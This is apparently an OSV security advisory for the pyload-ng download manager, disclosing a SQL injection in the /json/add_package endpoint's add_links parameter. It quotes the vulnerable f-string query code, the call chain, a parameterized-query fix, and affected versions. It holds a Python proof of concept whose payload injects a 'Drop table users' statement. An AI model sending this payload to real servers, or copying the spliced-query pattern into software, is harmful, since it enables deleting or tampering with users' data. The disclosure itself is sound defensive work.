PYSEC-2026-1821

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/pyload-ng/PYSEC-2026-1821.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1821
Aliases
Published
2026-07-07T16:03:00.874481Z
Modified
2026-07-07T17:47:48.191916536Z
Severity
  • 7.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter
Details

Summary

The parameter add_links in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.

Details

  • Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271
  • Affected code:

    @style.queue
        def update_link_info(self, data):
            """
            data is list of tuples (name, size, status, url)
            """
            self.c.executemany(
                "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)",
                data,
            )
            ids = []
            statuses = "','".join(x[3] for x in data)
            self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')")
            for r in self.c:
                ids.append(int(r[0]))
            return ids
    
    

    statuses is constructed from data, and data is the value of the addlinks parameter entered by the user through /json/addpackge. Because {statuses} is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.

  • Vulnerability Chain

    josn_blueprint.py#add_package
    src/pyload/core/api/__init__.py#add_package
    src/pyload/core/managers/file_manager.py#add_links
    src/pyload/core/threads/info_thread.py#run
    src/pyload/core/threads/info_thread.py#update_info
    src/pyload/core/managers/file_manager.py#update_file_info
    src/pyload/core/database/file_database.py#update_link_info
    

PoC

import requests


if __name__ == "__main__":
    url = "http://localhost:8000/json/add_package"
    data = {
        "add_name": "My Downloads1",
        "add_dest": "0",
        "add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--",
        "add_password": "mypassword"
    }

    response = requests.post(url, cookies=your_cookies, data=data)
    print(response.status_code, response.text)

image

Remediation

```python def updatelinkinfo(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, )

# 提取所有url
urls = [x[3] for x in data]

# 构建参数化查询,避免SQL注入
placeholders = ','.join(['?'] * len(urls))
query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)"
self.c.execute(query, urls)

ids = [int(row[0]) for row in self.c.fetchall()]
return ids

```

Impact

Attackers can modify or delete data in the database, causing data errors or loss.

References

Affected packages

PyPI / pyload-ng

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.5.0b3.dev91

Affected versions

0.*
0.5.0a5.dev528
0.5.0a5.dev532
0.5.0a5.dev535
0.5.0a5.dev536
0.5.0a5.dev537
0.5.0a5.dev539
0.5.0a5.dev540
0.5.0a5.dev545
0.5.0a5.dev562
0.5.0a5.dev564
0.5.0a5.dev565
0.5.0a6.dev570
0.5.0a6.dev578
0.5.0a6.dev587
0.5.0a7.dev596
0.5.0a8.dev602
0.5.0a9.dev615
0.5.0a9.dev629
0.5.0a9.dev632
0.5.0a9.dev641
0.5.0a9.dev643
0.5.0a9.dev655
0.5.0a9.dev806
0.5.0b1.dev1
0.5.0b1.dev2
0.5.0b1.dev3
0.5.0b1.dev4
0.5.0b1.dev5
0.5.0b2.dev9
0.5.0b2.dev10
0.5.0b2.dev11
0.5.0b2.dev12
0.5.0b3.dev13
0.5.0b3.dev14
0.5.0b3.dev17
0.5.0b3.dev18
0.5.0b3.dev19
0.5.0b3.dev20
0.5.0b3.dev21
0.5.0b3.dev22
0.5.0b3.dev24
0.5.0b3.dev26
0.5.0b3.dev27
0.5.0b3.dev28
0.5.0b3.dev29
0.5.0b3.dev30
0.5.0b3.dev31
0.5.0b3.dev32
0.5.0b3.dev33
0.5.0b3.dev34
0.5.0b3.dev35
0.5.0b3.dev38
0.5.0b3.dev39
0.5.0b3.dev40
0.5.0b3.dev41
0.5.0b3.dev42
0.5.0b3.dev43
0.5.0b3.dev44
0.5.0b3.dev45
0.5.0b3.dev46
0.5.0b3.dev47
0.5.0b3.dev48
0.5.0b3.dev49
0.5.0b3.dev50
0.5.0b3.dev51
0.5.0b3.dev52
0.5.0b3.dev53
0.5.0b3.dev54
0.5.0b3.dev57
0.5.0b3.dev60
0.5.0b3.dev62
0.5.0b3.dev64
0.5.0b3.dev65
0.5.0b3.dev66
0.5.0b3.dev67
0.5.0b3.dev68
0.5.0b3.dev69
0.5.0b3.dev70
0.5.0b3.dev71
0.5.0b3.dev72
0.5.0b3.dev73
0.5.0b3.dev74
0.5.0b3.dev75
0.5.0b3.dev76
0.5.0b3.dev77
0.5.0b3.dev78
0.5.0b3.dev79
0.5.0b3.dev80
0.5.0b3.dev81
0.5.0b3.dev82
0.5.0b3.dev85
0.5.0b3.dev87
0.5.0b3.dev88
0.5.0b3.dev89
0.5.0b3.dev90

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/pyload-ng/PYSEC-2026-1821.yaml"